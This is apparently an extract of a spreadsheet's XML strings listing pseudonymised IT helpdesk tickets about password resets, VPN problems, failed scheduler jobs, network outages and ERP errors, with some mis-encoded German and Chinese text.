der ordner schulzgth aus dem laufwerk public (\\HostName_717)ist mir abhandengekommen, kannst mir den wieder zurÃ¼ck holen? und ihn dann auf laufwerk, departments (\\HostName_717), distribution, formulare reinstellen, vielen dank im voraus._x000D_
_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>EU_tool not run since 03.00 p.m we didn't have any information about sistem shut down</t>
  </si>
  <si>
    <t>vmtwoadp ohjvlcmb</t>
  </si>
  <si>
    <t>i'm on vacation, and my vpn isn't working.  can you reset it for me?</t>
  </si>
  <si>
    <t>, vpn</t>
  </si>
  <si>
    <t>webpage won't load</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
i have been having trouble getting some webpages to load.
1st one is on the insurance site to change password. when i try to log on to the site it says i need to update my password. when i click on the ok all i get is a blank page. see below. please advise.
[cid:image001.png@01d20755.724b5580]
[cid:image002.jpg@01d20755.724b5580]
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve"> account lock release request of "kanghytaim"</t>
  </si>
  <si>
    <t>am keyence messgerÃ¤t monitor ausgetauscht</t>
  </si>
  <si>
    <t>ugvkyalo ayofwjpi</t>
  </si>
  <si>
    <t>probleme mit ie \dwgliuyt ieqgdpbm</t>
  </si>
  <si>
    <t>qtovukbc jumqcvti</t>
  </si>
  <si>
    <t>probleme mit ewew8311667 \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>tÃ¼r- Ã¶ffnerfunktion geht nicht.</t>
  </si>
  <si>
    <t xml:space="preserve"> keine tÃ¼r- Ã¶ffnerfunktion bei folgenden zeiterfassungskarten mÃ¶glich._x000D_
6045;4586;10039;2494;4646;6081;6082</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: frydqbgs.ugmnzfik@gmail.com_x000D_
_x000D_
hello all,_x000D_
_x000D_
net weaver business client doesn't work with the message below. it's daily required function, please fix soon._x000D_
_x000D_
_x000D_
[cid:image003.jpg@01d2077b.7c080d40]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">balance carry forward for ap and ar report </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ihfkwzjd.erbxoyqk@gmail.com_x000D_
_x000D_
dear it team_x000D_
_x000D_
i have run report as below i found that balance carry forward is not shown on the report both ap and ar report. please advise._x000D_
_x000D_
_x000D_
[cid:image002.jpg@01d2079b.c1165fc0]_x000D_
_x000D_
_x000D_
[cid:image004.jpg@01d2079b.c1165fc0]_x000D_
_x000D_
_x000D_
[cid:image006.jpg@01d2079b.c1165fc0]_x000D_
_x000D_
[cid:image012.jpg@01d2079b.c1165fc0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>re: finished: start of s&amp;op process -  my account is blocked - password issue</t>
  </si>
  <si>
    <t xml:space="preserve">it support _x000D_
could you please unlocked my account on supply_chain_software_x000D_
best </t>
  </si>
  <si>
    <t>awb not printed out</t>
  </si>
  <si>
    <t xml:space="preserve">can you please have a look to this, there seems to be no output in c:\shipping. to see this i had stopped ecs_print. it is dhl from apac to japan but other countries also affected_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>job Job_1953 was running longer than 30 minutes kirtyled and rerun</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1953 failed in job_scheduler at: 09/05/2016 05:40:00</t>
  </si>
  <si>
    <t>tastatur defekt \wcupoaty fqnzwphj</t>
  </si>
  <si>
    <t>wcupoaty fqnzwphj</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: xosycftu.olhpmsdw@gmail.com
hello
please unlock my password for erp.
i need to change my password soon.
user id: songhyody
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3181 failed in job_scheduler at: 09/05/2016 05:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3181 failed in job_scheduler at: 09/05/2016 05:00:00</t>
  </si>
  <si>
    <t>æŠ¥ç¨Žç”µè„‘ä¸èƒ½è”ç½‘ï¼Œè®©è´ºæ­£å¹³ä¼‘ã€‚</t>
  </si>
  <si>
    <t>abap runtime error with transaction zload</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000D_
_x000D_
enter user id of user having the issue: all user in plant_119 and plant_27_x000D_
_x000D_
transaction code(s) the user needs or was working with: zload_x000D_
_x000D_
describe the issue: abap runtime error_x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t>oebcqfli zvbxasky</t>
  </si>
  <si>
    <t>reset passwords for qgilmtyc gmscovxa using password_management_tool password reset.</t>
  </si>
  <si>
    <t>qgilmtyc gmscovxa</t>
  </si>
  <si>
    <t xml:space="preserve">archiving_tool scanner not working </t>
  </si>
  <si>
    <t xml:space="preserve">archiving_tool scanner not working._x000D_
_x000D_
please upgrade open text imaging scan to 10.2.0_x000D_
opentext imaging enterprise scan 10..2.0_x000D_
</t>
  </si>
  <si>
    <t>giumxwvh lfvwjtin</t>
  </si>
  <si>
    <t>reset passwords for rlhuwmve krcfhoxj using password_management_tool password reset.</t>
  </si>
  <si>
    <t>please reseat SID_1. i need to uacyltoe hxgaycze something.</t>
  </si>
  <si>
    <t xml:space="preserve">computer can't started  </t>
  </si>
  <si>
    <t>hctajofe qgrkcxyt</t>
  </si>
  <si>
    <t>defekt lwl leitung \box defekt \vaigycet jtgmpdcr</t>
  </si>
  <si>
    <t>ieæµè§ˆå™¨æ— æ³•æ‰“å¼€ã€‚</t>
  </si>
  <si>
    <t>dkxstwfq eljczgbn</t>
  </si>
  <si>
    <t>ç³»ç»Ÿæ•…éšœï¼Œå¯åŠ¨è“å±.</t>
  </si>
  <si>
    <t xml:space="preserve">ç³»ç»Ÿæ•…éšœï¼Œå¯åŠ¨è“å±. </t>
  </si>
  <si>
    <t>lhkqbmna ekhtivsd</t>
  </si>
  <si>
    <t>guestcompany access for wifi</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: htnvbwxs.gwfrzuex@gmail.com_x000D_
_x000D_
good morning._x000D_
_x000D_
i have our coivmhwj opwckbrv here, and would like for them to access to guestcompany wifi._x000D_
_x000D_
there will be 5 of them._x000D_
_x000D_
they will be here for 3 weeks._x000D_
_x000D_
do i need to create separate accesses for them or can they share 1 login access?_x000D_
_x000D_
please advise._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>after changing to new group, several workflow items from old group are (still) visible in new groups workflow, too /-154</t>
  </si>
  <si>
    <t>phone: 
changed from milling team  csd 5111156895 to holemaking team csd 515611894, but still several workflow items from old group are visible in new groups workflow, too. erp substitution was ended by old team, as far as i was informed.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1315 failed in job_scheduler at: 09/05/2016 02:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1315 failed in job_scheduler at: 09/05/2016 02:12:00</t>
  </si>
  <si>
    <t>[erp] query "zload" for production scheduling is generating abap error message</t>
  </si>
  <si>
    <t xml:space="preserve">got forwarded an email regarding erp query zload generating error message. _x000D_
_x000D_
see attachment for further details._x000D_
_x000D_
i'm not sure how big of an impact this has so currently opening with sev3 - feel free to raise the priority in case this is a known important query._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>vip2 -enable to save to local pc in citrix with erp gui. assign to whomever supports citrix.</t>
  </si>
  <si>
    <t xml:space="preserve">vendor is creating reports for the usa carve-out and is unable to save reports to the local pc. she is using the erp gui.   a solution must be provided immediately if not sooner as this will delay the project.
description form the vendor (vvgtybyrn):
once i am running reports, where can i save them? i need to save them as unconverted text, &amp; then i need to open each in excel &amp; make a few formatheywting changes before i save it &amp; send to the team leads. i ran a uacyltoe hxgaycze using se38 for the programdnty attached to the transaction, &amp; i cannot save to my own machine. i did try a thumb drive, but that was also unsuccessful. is there somewhere on the network where i can save them &amp; then someone can send them to me so i can format them on my own machine &amp; send them out? or if you have another idea on how we can accomplish it, that would be great.
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vhlepcta.lqbgcxpt@gmail.com_x000D_
_x000D_
hello team,_x000D_
abdhtyu account is locked out, could you please check?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>power outage: usa tn, tm-usa-att-rtr circuit went  down at 03:04 am et on 09/05. global_telecom_1 ticket# 690500063</t>
  </si>
  <si>
    <t>usa tn, tm-usa-att-rtr circuit went  down at 03:04 am et on 09/05. servers also went down but we see comcast circuit is up._x000D_
_x000D_
usa tn, tm-usa-att-rtr - interface 'gigabitetâ€‹hernet0/1 Â· " connection to nexus5k001 "' has state: down since 11:52 pm et on 09/04.</t>
  </si>
  <si>
    <t>access to network folder</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sxnzacoj.lwvqgfby@gmail.com
please provide read and write access to mr. frseoupk feluybrn and karghytuthik  for following network folder
\\HostName_95\grinding
</t>
  </si>
  <si>
    <t>not able to log on to hub from remote location, urgent please call.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: slfxjznk.hmspexor@gmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 09/04/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 09/04/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 09/04/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 09/04/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 09/04/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 09/04/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">vpn(apvpn ,vpn) unable to connection  . </t>
  </si>
  <si>
    <t xml:space="preserve">vpn(apvpn ,vpn) unable to connection  .  </t>
  </si>
  <si>
    <t>unable to generate po as per pr 3063.41.49.092</t>
  </si>
  <si>
    <t xml:space="preserve">we've found the pop-up error when generating sto as per pr# 4121022907/00001 as attached, please help fixing this issue aerp., </t>
  </si>
  <si>
    <t>please unlock my erp</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xosycftu.olhpmsdw@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
please unlock my erp._x000D_
_x000D_
user id: songhyody_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mm# 5260903 ( kr230 )</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hmjdrvpb.komuaywn@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
could you please organise the mwst % tax for 1301 / 02, 03, 05 on the abovementioned rqfhiong zkwfqagb number?_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>i forgot my erp password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uwlnpscr.lvkujfse@gmail.com_x000D_
_x000D_
dears,_x000D_
_x000D_
i forgot my erp password. could you help me to reset it? </t>
  </si>
  <si>
    <t>uwlnpscr lvkujfse</t>
  </si>
  <si>
    <t>the terminate action for nyzxjwud jvtsgmin has completed.</t>
  </si>
  <si>
    <t xml:space="preserve">
-----original message-----
from: jobxpkrg klonypzr [mailto:system@hr_tool.com] 
sent: monday, september 05, 2016 6:08 am
to: nwfodmhc exurcwkm
subject: the terminate action for nyzxjwud jvtsgmin has completed.
hello , 
a termination for nyzxjwud jvtsgmin, 1133645201, effective 08/25/2016  has been approved.
click the link to view.
</t>
  </si>
  <si>
    <t>jobxpkrg klonypzr</t>
  </si>
  <si>
    <t>network outage at usa since 8:40pm et 09/04.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____8:40pm et 09/04.__________________x000D_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__no______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</si>
  <si>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zcor0003 report issue</t>
  </si>
  <si>
    <t>please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the "operations" folder)._x000D_
site / location : apac apac_x000D_
user id (ad) :lia1_x000D_
system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj):erp_x000D_
transactions that are slow (e.g., va01, create an order): zcor0003_x000D_
area this belongs to (e.g., sales, finance, markhtyeting etc.):fin_x000D_
how can this issue be replicated by the it support group: zcor0003 report is used to get shipment data. there is variant tj331, now the data is incorrect for this report, would you please help to check what's the issue? we find the problem on sep 2._x000D_
the shipment details for aug is download on sep 1 as attached. this report is running daily to tracking shipment. _x000D_
if you need other information, you can contact me. _x000D_
are other users seeing this? other users in tj _x000D_
please attach relevant screenshots and exact times when the issue occurred:</t>
  </si>
  <si>
    <t>uylomcrx nfvjsgze</t>
  </si>
  <si>
    <t xml:space="preserve">help to change the windows password using password_management_tool password tool.  </t>
  </si>
  <si>
    <t xml:space="preserve">help to change the windows password using password_management_tool password tool.
-connected to the user system using teamviewer.
-help the user login to the password_manager_tool password tool and change the passwords.
-help the user to sync the psswords to the company network.
-caller confirmed that he was able to login.
-issue resolved.
</t>
  </si>
  <si>
    <t>uiaqhcpo nxzcieho</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_5_regen failed in job_scheduler at: 09/04/2016 16:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_5_regen failed in job_scheduler at: 09/04/2016 16:32:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1306 failed in job_scheduler at: 09/04/2016 15:29:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1306 failed in job_scheduler at: 09/04/2016 15:29:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrattr failed in job_scheduler at: 09/04/2016 12:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrattr failed in job_scheduler at: 09/04/2016 12:11:00</t>
  </si>
  <si>
    <t>windows password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tbioceqj.ukjietwz@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i want change my password and make a mistake,_x000D_
can you please reject to my old one_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_1_regen failed in job_scheduler at: 09/04/2016 10:17:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_1_regen failed in job_scheduler at: 09/04/2016 10:17:00</t>
  </si>
  <si>
    <t>firmware upgrade on the phones</t>
  </si>
  <si>
    <t xml:space="preserve">davgtgyrh called in for an issue where there was supposed to be a firmware upgrade on the phones but davgtgyrh mentioned that the phones are still rebooting and its on a loop.
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1395 failed in job_scheduler at: 09/04/2016 07:58:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1395 failed in job_scheduler at: 09/04/2016 07:58:00</t>
  </si>
  <si>
    <t>emailing: 16-177747.htm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cowsvzel.ryhkefwv@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
_x000D_
now a days we are getting lot of other regions report in india dump, can you please solve this_x000D_
every month we get close to 5-10 engineering_tool's  in to our system_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>network outage :bellusco, it - divestiture site:site hard down since at 6:40 am et on 09/04.no backup</t>
  </si>
  <si>
    <t>what type of outage:  __x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes___     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____6:40 am et on 09/04_________________x000D_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_na___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___na___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</si>
  <si>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when vigrtgyne is logging into his laptop, the laptop is automatically shutting down. he tried doing a power shutdown and also kept the pc off for an hour but still the same. the moment he's logging in, pc is shutting down by itself.
user id - ravhdyui
pc name - aidl8911055
service tag - dbd1hz1
model - latitude e5430 non-vpro
</t>
  </si>
  <si>
    <t xml:space="preserve">job co_val_update_crosscomp failed in job_scheduler at: 09/04/2016 05:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job co_val_update_crosscomp failed in job_scheduler at: 09/04/2016 05:55:00</t>
  </si>
  <si>
    <t>network outage: turkey turkey - site hard down since on 01:56 am et on 09/04/16 .</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____slo_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______ 01:56 am et._______________x000D_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____no____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______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</si>
  <si>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SID_48cold failed in job_scheduler at: 09/03/2016 21:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_48cold failed in job_scheduler at: 09/03/2016 21:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_50cold failed in job_scheduler at: 09/03/2016 21:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_50cold failed in job_scheduler at: 09/03/2016 21:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_27hot failed in job_scheduler at: 09/03/2016 20:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_27hot failed in job_scheduler at: 09/03/2016 20:55:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_41cold failed in job_scheduler at: 09/03/2016 20:52:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_41cold failed in job_scheduler at: 09/03/2016 20:52:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_44cold failed in job_scheduler at: 09/03/2016 20:41:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_44cold failed in job_scheduler at: 09/03/2016 20:41:00</t>
  </si>
  <si>
    <t>bridgex from lacw8515941  step 'login' failed: resource not found</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_27hot failed in job_scheduler at: 09/03/2016 20:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_27hot failed in job_scheduler at: 09/03/2016 20:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_41cold failed in job_scheduler at: 09/03/2016 20:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_41cold failed in job_scheduler at: 09/03/2016 20:04:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_51cold failed in job_scheduler at: 09/03/2016 20:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_51cold failed in job_scheduler at: 09/03/2016 20:04:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_23cold failed in job_scheduler at: 09/03/2016 19:58:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_23cold failed in job_scheduler at: 09/03/2016 19:58:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_727 failed in job_scheduler at: 09/03/2016 19:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_727 failed in job_scheduler at: 09/03/2016 19:54:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_38cold failed in job_scheduler at: 09/03/2016 19:53:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_38cold failed in job_scheduler at: 09/03/2016 19:53:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_32cold failed in job_scheduler at: 09/03/2016 19:50:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_32cold failed in job_scheduler at: 09/03/2016 19:50:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_39cold failed in job_scheduler at: 09/03/2016 19:34:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_39cold failed in job_scheduler at: 09/03/2016 19:34:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_79cold failed in job_scheduler at: 09/03/2016 19:34:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_79cold failed in job_scheduler at: 09/03/2016 19:34:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_47cold failed in job_scheduler at: 09/03/2016 19:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_47cold failed in job_scheduler at: 09/03/2016 19:33:00</t>
  </si>
  <si>
    <t>node HostName_587 located at germany is down since  6:19 pm 9/3 et</t>
  </si>
  <si>
    <t>node HostName_20 located at Israel is down since  9/3 at  5:15 pm et</t>
  </si>
  <si>
    <t>node HostName_20 located at EMEA is down since  9/3 at  5:15 pm et</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1665 failed in job_scheduler at: 09/03/2016 18:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1665 failed in job_scheduler at: 09/03/2016 18:30:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_484 failed in job_scheduler at: 09/03/2016 12:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_484 failed in job_scheduler at: 09/03/2016 12:04:00</t>
  </si>
  <si>
    <t>delete personal address from system</t>
  </si>
  <si>
    <t xml:space="preserve">from: qpixeudn rjlziysd 
sent: saturday, september 03, 2016 5:04 pm
to: nwfodmhc exurcwkm
cc: ifblxjmc dyrgfwbm; jayachandran reddy
subject: re: ee personal address in system
hello all...
bill here on sat. morning battling a hurricane in va. beach. 
i looked back at the e mailsi have received on my g mail account and see one from callie with "hrssc" as a copy list. candice with the same copy list and a lynda at hr shared service with again the same copy list. 
i hope this helps!!
bb
bigtyl bachsmhdyhti
eastern zone manager
company
on sep 2, 2016, at 5:20 pm, nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt; wrote:
hi candice,
does this happen when you send an email to a specific group or all the groups that bill is a part of? if it is a  single group, may i know the group's name?
</t>
  </si>
  <si>
    <t>qpixeudn rjlziysd</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1983 failed in job_scheduler at: 09/03/2016 08:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1983 failed in job_scheduler at: 09/03/2016 08:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">no sound </t>
  </si>
  <si>
    <t xml:space="preserve">unable to create  erp notification </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dfiyvmec.wxioadpt@gmail.com
[cid:image001.png@01d205fe.ffce2de0]
kuhgtyjvelu. u
manager â€“ reliability engineering
dfiyvmec.wxioadpt@gmail.com&lt;mailto:dfiyvmec.wxioadpt@gmail.com&gt;
</t>
  </si>
  <si>
    <t>inwarehouse_tool format - issue outputs to e-mail</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zfliqpxm.dgfvaqlh@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
while using t/c  zz_mails  we are getting inwarehouse_tools in 2 different formats._x000D_
please refer enclosed e-mails_x000D_
_x000D_
inwarehouse_tool 0512673680       : not okay_x000D_
_x000D_
inwarehouse_tool 0512669014       : is okay_x000D_
_x000D_
please help us in getting all inwarehouse_tools as per format appearing in inwarehouse_tool 0512669014_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1913 failed in job_scheduler at: 09/03/2016 06:34:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1913 failed in job_scheduler at: 09/03/2016 06:34:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1996 failed in job_scheduler at: 09/03/2016 06:26:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1996 failed in job_scheduler at: 09/03/2016 06:26:00</t>
  </si>
  <si>
    <t>i can't logon erp at home, please help to solve this issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: baoapacg.wanrtyg@company.com_x000D_
_x000D_
[cid:image001.png@01d2060f.78853e80]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">network outage:milton keynes, uk - divestiture site: site is hard down since at 3:46 am et on 09/03.no backup </t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______3:46 am et on 09/03_______________x000D_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</si>
  <si>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bk_hana_SID_62_os_dly_dp failed in job_scheduler at: 09/03/2016 04:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_62_os_dly_dp failed in job_scheduler at: 09/03/2016 04:02:00</t>
  </si>
  <si>
    <t>new order</t>
  </si>
  <si>
    <t xml:space="preserve">from: jmfvwrek pqwehmzgagannathan _x000D_
sent: saturday, september 03, 2016 9:54 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: notification: fw: re: new order_x000D_
_x000D_
hello,_x000D_
_x000D_
am forwarding the trailing mail received. kindly do the needful. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">ad account locked </t>
  </si>
  <si>
    <t>ezkgipuv ozcvnkht</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to web </t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to web ,and check download files </t>
  </si>
  <si>
    <t>bearzclk xnvqipcz</t>
  </si>
  <si>
    <t>emails not available in outlook but available in owa</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dargthy.sohfyuimaiah@company.com
team,
i am unable to view emails in outlook of june 2015 and before, but i can see them in owa.
its difficult to analyze the old emails in owa compared to outlook.
could you please help in refreshing the emails in outlook.
my outlook version is 2016.
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1384 failed in job_scheduler at: 09/03/2016 01:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1384 failed in job_scheduler at: 09/03/2016 01:09:00</t>
  </si>
  <si>
    <t>desktop icon size issue</t>
  </si>
  <si>
    <t>name:jvpkulxw ovuweygj
language:
browser:microsoft internet explorer
email:jvpkulxw.ovuweygj@gmail.com
customer number:
telephone:
summary:desktop icon size issue</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hoti failed in job_scheduler at: 09/02/2016 22:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hoti failed in job_scheduler at: 09/02/2016 22:20:00</t>
  </si>
  <si>
    <t>mouse started jumping all over the screen again.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ulroqsyf.wctpnarb@gmail.com_x000D_
_x000D_
i had this problem earlier._x000D_
this was resolved by replacement of hardware._x000D_
_x000D_
however i am experiencing this problem again..pl support_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ulroqsyf wctpnarb</t>
  </si>
  <si>
    <t>vpn vpn access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qfcxbpht.oiykfzlr@gmail.com_x000D_
_x000D_
for some reason my logon information won't work with vpn vpn access tonight.  could you please investigate?  the following is the link i follow._x000D_
_x000D_
_x000D_
_x000D_
               </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2573 failed in job_scheduler at: 09/02/2016 18:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2573 failed in job_scheduler at: 09/02/2016 18:00:00</t>
  </si>
  <si>
    <t>#mm2247736 can not inwarehouse_tool consignment mb58 acct 81254672, total 36 piezas.</t>
  </si>
  <si>
    <t>erp report zcor0003 variant rod stock 1 is working for some employee's in the usa plant.</t>
  </si>
  <si>
    <t>report won't work.</t>
  </si>
  <si>
    <t>xjeblpst dohnewjg</t>
  </si>
  <si>
    <t>unable to edit quantities under oppurtunities in crm</t>
  </si>
  <si>
    <t xml:space="preserve">unable to edit quantities under oppurtunities in crm. refer attachment.
phone: </t>
  </si>
  <si>
    <t>need email address to login to outlook</t>
  </si>
  <si>
    <t>lsnpqxhw nplqhzrv</t>
  </si>
  <si>
    <t xml:space="preserve">hana </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nealxjbc.owjduxai@gmail.com
earlier i started a chat with rakthyesh.  i was pulling a report though hana and after selecting the analysis tab and refreshing i was thing going to display.  i needed to filter this template to add my plant.  when i would select display all of my boxes were empty (see attached).  he did something and asked me to close and reopen.  once i reopened my analysis tab was gone so i wasn't able to refresh to then go to display to see if my filters were fixed.
